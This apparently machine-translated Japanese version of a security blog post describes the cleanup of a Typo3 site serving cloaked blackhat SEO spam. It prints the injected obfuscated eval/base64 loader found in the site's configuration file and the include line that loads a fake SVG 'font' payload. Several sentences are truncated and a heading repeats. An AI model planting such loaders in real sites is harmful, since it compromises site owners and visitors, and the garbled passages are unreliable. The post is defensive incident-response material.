タイプミス3スパム感染

Posted on

ここでSucuriで私たちが対処するマルウェアのほとんどは、CMSプラットフォーム上にあります:

  • ワードプレス、
  • Joomla、
  • Drupal、
  • Magento、
  • など。

しかし、時々私たちは少し違う何かに遭遇します。

ちょうど最近、私はblackhat SEOスパム感染に感染していたTypo3CMSを使用してウェブサイトを発見しました:

私が始める前に、Typo3CMS

Typo3CMS

私が始める前に、Typo3CMS

Typo3CMS

私が始める前に、Typo3CMS

Typo3

Typo3ウェブサイトのクリーンアッププロセスを開始

毎日同じCMSプラットフォームで作業するときは、問題(WordPress/Joomlaのコアまたはテンプレートファイル、Magentoのcore_config_dataまたはcms_blockデータベーステーブルなど)を見つけるためにすぐにどこを見るべきかを知っています。

だから私はこのケースに遭遇したとき、私はかなりどこから始めればよいかわかりませんでした。 私はこれが本当に素晴らしいケーススタディだと思う理由です,特にハッキングされたウェブサイトで自分自身を見つけることができ、次に何をすべき

ウェブサイトに表示されたスパムは、これらの黒い帽子のSEO感染に非常に一般的なGooglebotのような検索エンジンのユーザーエージェントにのみ提供されていました。

サイトへの通常の(人間の)訪問者は、通常のページが表示されますが、検索エンジンがwebページをクロールするとき、彼らはスパムwebサイトへのリンクをイン

1–ファイルシステムの検索

私は明らかな条件付き感染である可能性のあるコードを特定できるかどうかを確認するために、ファイルシステム

その後、私はいくつかの他の用語を検索しましたが、ちょうどノイズの束で満たされました。

2–ログの確認

ウェブサイトのセキュリティの非常に重要な側面の1つは、監視とログです。

このサイトは私たちの監視下にあったので、私は問題を引き起こすために先週かそこらでこのウェブサイト上で何かが変更されている必要があ:

監視ログ
Sucuriダッシュボード上の監視ログ

私の次のステップは、どこかに私を導く可能性のある最近変更されたファイルのために私たちのウェブサイ あなたがここで読むことができるそれらのログの重要性についての素晴らしい投稿があります。

2018-10-08 10:02:56 www.***********.com: Warning: File modified: ./typo3conf/LocalConfiguration.php (old size: 6067, new size: 6309).

CMSの設定ファイルが最近変更されたようで、警告が発行されたのとほぼ同じ時間です。 見てみましょう!ステップ3-Typo3設定ファイルの確認

ファイルの先頭に次のコードが挿入されていることがわかりました:

<?php eval(gzinflate(base64_ decode('y8xLzilNSY3Pz0tOVVDX00 /LzElNTMnNzNNPyknRT8vPKynWL0jXKy5LV7cGAA==')));

だから犯人を見つけたと思う!

Typo3でのスパム感染

感染を詳しく見てみましょう。 使用する私のお気に入りのツールの一つは、このオンラインPHPサンドボックスです。 ここで行う必要があるのは、evalをechoに置き換えることだけです。:

include_once './fileadmin/bld/fonts/pg.svg';

そのファイルの中を見てみましょう(編集済みのコンテンツ):

Typo3Snippetでのスパム感染
Typo3Snippetでのスパム感染

それは私が今まで見たフォントや画像のようには見えません。 感染のペイロードを見つけたようです。 CMSの設定ファイルを介してロードされている偽の”フォント”。

PHPコード自体はいくつかの異なる難読化技術を使用していましたが、最終的には、ウェブサイトに影響を与えるのと同じ古いblackhat SEOスパムでした。

興味深いことに、検出された変更されたファイルをチェックアウトすると、最終変更日が改ざんされているように見えます:

日付が変更されたファイル
日付が変更されたファイル

通常、攻撃者は自分の活動を隠すために最善を尽くします。 実際には、最終更新日が改ざんされているのを見るのは非常に一般的です。 あなたが見ることができるように、この感染は、この方法が野生で使用されていることを示しています。

結論

最終的な分析では、このケースは、サイトをクリーンアップするためにどのように動作するかを知るために、セキュリティの第一人者であるか、CMSプラッ

あなたは、いくつかの基本的なセキュリティの基礎に基づいている必要があり、あなたのログにアクセスする必要があり、あなたが見るすべてのフ

あなたはウェブサイトをきれいにする方法についての詳細を学びたい場合は、私たちはあなたを助けることができるDIYガイドを書いています。

あなたがウェブサイトのセキュリティソリューションを探しているなら、私たちはそれが何であるかCMSに関係なく、あなたのウェブサイトを監視、クリー

コメントを残す

メールアドレスが公開されることはありません。